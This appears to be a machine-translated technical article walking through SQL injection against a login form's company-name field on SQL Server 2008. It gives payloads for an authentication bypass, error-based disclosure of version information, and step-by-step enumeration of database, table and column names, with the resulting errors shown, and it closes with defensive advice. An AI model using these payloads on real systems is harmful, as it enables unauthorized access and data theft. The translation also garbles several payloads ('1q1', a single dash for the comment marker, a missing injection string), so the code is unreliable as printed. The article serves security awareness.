Shulou(Shulou.com)05/31 Report--

This article will explain in detail how the in-depth analysis of the whole process of SQL injection is, and the content of the article is of high quality, so the editor will share it with you for reference. I hope you will have a certain understanding of the relevant knowledge after reading this article.

The whole process of SQL injection is analyzed, which is as follows:

Preliminary injection-bypass verification and log in directly

The landing frame of the company's website is as follows:

You can see that in addition to the account password, there is also an input box for the company name. According to the form of the input box, it is not difficult to deduce the writing of SQL as follows: copy code as follows: SELECT * From Table WHERE Name='XX' and Password='YY' and Corp='ZZ'

I found that the first two do some checks, but the third input box is negligent, the loophole is here! To start the injection, enter the following in the input box:

The user name is filled in indiscriminately, and the password is left blank. In this case, after clicking the login button, you have successfully logged in.

Let's take a look at the final SQL and we'll find out why: the copy code is as follows: SELECT * From Table WHERE Name='SQL inject' and Password='' and Corp='' or 1.

As can be seen from the code, the first half of the single quotation marks are closed, the second half of the single quotes are commented out by "-", and there is an ever-valid condition "1q1" in the middle, which results in the result that any character can log in successfully. The harm of Sql injection is not just anonymous login.

Intermediate injection-obtaining information with the help of exceptions

Now let's write in the third input box:

'or 1 = (SELECT @ @ version)-

As follows:

The background SQL looks like this:

SELECT * From Table WHERE Name='SQL inject' and Password='' and Corp=''or 1 = (SELECT @ @ VERSION) -'

The judgment condition becomes 1 = (SELECT @ @ VERSION)

This way of writing will certainly lead to errors, but mistakes are exactly what we want. After clicking to log in, the following information appears on the page:

Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 (SP3)-10.0.5500.0 (X64) Sep 21 2011 22:45:45Copyright (c) 1988-2008 Microsoft Corporation Developer Edition (64-bit) on Windows NT 6.1 (Build 7601: Service Pack 1)' to data type int.

Something terrible happened when the server's operating system and SQL Server version information was displayed in error.

Harm expansion-get all the library names, table names, and field names of the server

Next, we enter the following information in the input box: the copy code is as follows: t'or 1 = (SELECT top 1 name FROM master..sysdatabases where name not in (SELECT top 0 name FROM master..sysdatabases))--

At this time, it is found that there is a limit on the number of words in the third input box, but this restriction on the client is virtually non-existent.

It can be removed directly through the Google browser.

Click to log in, and the information returned is as follows:

Conversion failed when converting the nvarchar value 'master' to data type int.

The database name "master" is displayed with an exception! Change the sequence number in the above SQL statement in turn

You can get the names of all the databases on the server.

Then, enter the following information: the copy code is as follows: B'or 1 = (SELECT top 1 name FROM master..sysobjects where xtype='U' and name not in (SELECT top 1 name FROM master..sysobjects where xtype='U'))--

The returned information is as follows:

Conversion failed when converting the nvarchar value 'spt_fallback_db' to data type int.

We got the first table name in the master database: "spt_fallback_db"

As above, change the serial number in turn to get all the table names of the library.

Now let's take the "spt_fallback_db" table as an example and try to get all the field names in the table. Enter the following code in the input box: the copy code is as follows: B'or 1 = (SELECT top 1 master..syscolumns.name FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='spt_fallback_db')

As a result, you get the following error prompt:

"Conversion failed when converting the nvarchar value 'xserver_name' to data type int."

In this way, the first field name "xserver_name" comes out, and all the field names can be traversed by changing the sequence number in turn.

The ultimate goal is to get the data in the database

At this point, we know that all databases, tables, and their fields can be obtained through SQL injection. In order to prevent this article from being completely reduced to an injection tutorial, the code for getting data will no longer be described, and the purpose of this article has been achieved. What does SQL injection mean? It means that all data in the database can be stolen.

When this harm is known, can anyone still ignore the SQL injection vulnerability?

Conclusion

With regard to security, the following points are summarized:

1. Always be vigilant about what the user enters.

two。 Only client authentication equals no authentication.

3. Never expose server error messages to users.

In addition, I would like to add a few points: SQL injection can be achieved not only through the input box, but also through Url.

two。 In addition to server error pages, there are other ways to get database information.

3. The injection behavior can be simulated by software, which can steal information much faster than you think.

4. The vulnerability has nothing to do with the language platform.

This is the end of the in-depth analysis of the whole process of SQL injection. I hope the above content can be helpful to you and learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.